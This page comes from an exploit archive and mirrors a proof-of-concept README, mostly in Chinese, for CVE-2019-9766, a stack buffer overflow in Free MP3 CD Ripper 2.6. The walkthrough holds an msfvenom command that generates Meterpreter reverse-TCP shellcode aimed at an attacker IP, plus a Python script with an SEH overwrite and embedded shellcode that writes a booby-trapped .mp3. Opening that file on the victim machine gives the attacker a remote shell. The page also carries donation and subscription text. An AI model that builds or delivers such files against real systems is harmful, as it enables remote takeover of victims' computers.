Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-9766 PoC — Free MP3 CD Ripper 缓冲区错误漏洞

Source
https://github.com/zeronohacker/CVE-2019-9766
Associated Vulnerability
Title:Free MP3 CD Ripper 缓冲区错误漏洞 (CVE-2019-9766)
Description:Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file.
Description
Free MP3 CD Ripper 2.6 版本中存在栈缓冲区溢出漏洞 (CVE-2019-9766),远程攻击者可借助特制的 .mp3 文件利用该漏洞执行任意代码。
Readme
# CVE-2019-9766

利用 Free MP3 CD Ripper2.6 版本存在的缓冲区溢出漏洞,构造特殊的 MP3 文件,攻击者在使用播放器进行播放时,音频文件蜜饵利用缓冲区溢出漏洞执行任意代码。

## 复现

攻击机:kali201903 (192.168.198.142)

受害机:windows10 21H1 (192.168.198.137)

在受害机上安装好 Free MP3 CD Ripper 2.6,在 kali 机上利用 MSF 生成反向连接 shellcode:

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.142 lport=888 -f c --smallest
```

![image-20220914095217904](https://user-images.githubusercontent.com/65578786/190044303-edef1acf-b5e3-47dc-a0bf-f3713f4a2e45.png)

将上述生成的 payload 替换下面这段代码中的 payload

```python
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6

buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x84\x20\xe4\x66"
nops = "\x90" * 5
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
buf += "\x68\x02\x00\x03\x78\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

pad = "B" * (316 - len(nops) - len(buf))
payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f = open("Test_Free_MP3.mp3","w")
    print "[+]Creating %s bytes mp3 Files..."%len(payload)
    f.write(payload)
    f.close() 
    print "[+]mp3 File created successfully!"
except:
    print "File cannot be created!"
```

运行脚本,生成一个 .mp3 文件:

![image-20220914095432399](https://user-images.githubusercontent.com/65578786/190044366-e7e2f51c-8e05-466b-ad1b-cc9ac7727e94.png)

将此 mp3 文件移动到受害机上,接下来在 kali 机上启动 MSF 控制台,设置下参数,如下:

![image-20220914095709754](https://user-images.githubusercontent.com/65578786/190044401-94d4d22e-ede8-469c-bc4e-70f33aebb64d.png)

设置好后开始监听,受害机上用软件打开 mp3 文件,反弹 shell 成功:

![image-20220914100209829](https://user-images.githubusercontent.com/65578786/190044428-25c43ec2-f191-495e-84f4-08e141981579.png)

**注**:只能用 Kali2019 版本才行,kali 2020 及其后都失败 (与 MSF 版本有关),另外需在 windows10 下,windows7 下验证失败 (均 64 位)

参考:https://www.code456.com/article/1464254.html
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →